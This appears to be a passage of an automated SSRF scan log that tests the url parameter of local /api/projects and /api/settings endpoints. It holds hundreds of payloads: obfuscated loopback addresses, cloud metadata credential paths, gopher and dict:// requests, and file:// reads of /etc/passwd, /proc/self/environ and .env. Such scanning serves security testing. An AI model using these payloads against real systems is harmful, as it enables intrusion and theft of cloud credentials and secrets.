`http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/projects?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/projects?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/projects?url=2130706433%2F` +- Testing: `http://localhost:4200/api/projects?url=3232235521%2F` +- Testing: `http://localhost:4200/api/projects?url=3232235777%2F` +- Testing: `http://localhost:4200/api/projects?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/projects?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/projects?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/projects?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/projects?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/projects?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/projects?url=0%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.1` +- Testing: `http://localhost:4200/api/projects?url=localtest.me` +- Testing: `http://localhost:4200/api/projects?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/projects?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/projects?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/projects?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/projects?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/projects?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/projects?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/projects?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/projects?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.0.1.3` +- Testing: `http://localhost:4200/api/projects?url=0` +- Testing: `http://localhost:4200/api/projects?url=127.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.1` +- Testing: `http://localhost:4200/api/projects?url=localhost` +- Testing: `http://localhost:4200/api/projects?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/projects?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/projects?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/projects?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/projects?url=7F000001` +- Testing: `http://localhost:4200/api/projects?url=2130706433` +- Testing: `http://localhost:4200/api/projects?url=6425673729` +- Testing: `http://localhost:4200/api/projects?url=127001` +- Testing: `http://localhost:4200/api/projects?url=127_0._0_1` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/projects?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/projects?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/projects?url=localtest.me` +- Testing: `http://localhost:4200/api/projects?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/projects?url=127.127.127.127` +- Testing: `http://localhost:4200/api/projects?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/projects?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=0x7f000001` +- Testing: `http://localhost:4200/api/projects?url=017700000001` +- Testing: `http://localhost:4200/api/projects?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/projects?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/projects?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/projects?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/projects?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/projects?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/projects?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/projects?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254` +- Testing: `http://localhost:4200/api/projects?url=2852039166` +- Testing: `http://localhost:4200/api/projects?url=7147006462` +- Testing: `http://localhost:4200/api/projects?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/projects?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/projects?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/projects?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/projects?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/projects?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/projects?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/projects?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/projects?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/projects?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/projects?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/projects?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/projects?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/projects?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/projects?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/projects?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/projects?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/projects?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/projects?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/projects?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/projects?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/projects?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/projects?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.0` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/projects?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/projects?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/projects?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/projects?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/projects?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/projects?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/projects?url=3232235521` +- Testing: `http://localhost:4200/api/projects?url=3232235777` +- Testing: `http://localhost:4200/api/projects?url=425.510.425.510` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/projects?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/projects?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/projects?url=instance-data` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A22` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A443` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A80` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/projects?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/projects?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/projects?url=loopback` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A22` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A80` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A443` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/projects?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/projects?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/projects?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/projects?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/projects?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/projects?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/projects?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/projects?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/projects?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/projects?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/projects?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/projects?url=127.1%3A80` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/projects?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/projects?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/projects?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/projects?url=2130706433%2F` +- Testing: `http://localhost:4200/api/projects?url=3232235521%2F` +- Testing: `http://localhost:4200/api/projects?url=3232235777%2F` +- Testing: `http://localhost:4200/api/projects?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/projects?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/projects?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/projects?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/projects?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/projects?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/projects?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/projects?url=0%2F` +- Testing: `http://localhost:4200/api/projects?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/projects?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/settings +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/settings?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/settings?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/settings?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/settings?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/settings?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/settings?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/settings?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/settings?url=127.1%3A80` +- Testing: `http://localhost:4200/api/settings?url=0` +- Testing: `http://localhost:4200/api/settings?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/settings?url=localhost%3A80` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/settings?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/settings?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/settings?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/settings?url=127.127.127.127` +- Testing: `http://localhost:4200/api/settings?url=127.0.1.3` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.0` +- Testing: `http://localhost:4200/api/settings?url=2130706433` +- Testing: `http://localhost:4200/api/settings?url=017700000001` +- Testing: `http://localhost:4200/api/settings?url=0x7f000001` +- Testing: `http://localhost:4200/api/settings?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/settings?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/settings?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/settings?url=google.com.localhost` +- Testing: `http://localhost:4200/api/settings?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=` +- Testing: `http://localhost:4200/api/settings?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/settings?url=localtest.me` +- Testing: `http://localhost:4200/api/settings?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/settings?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/settings?url=127%E3%80%820%E3%80%820%E3%80%821` +- 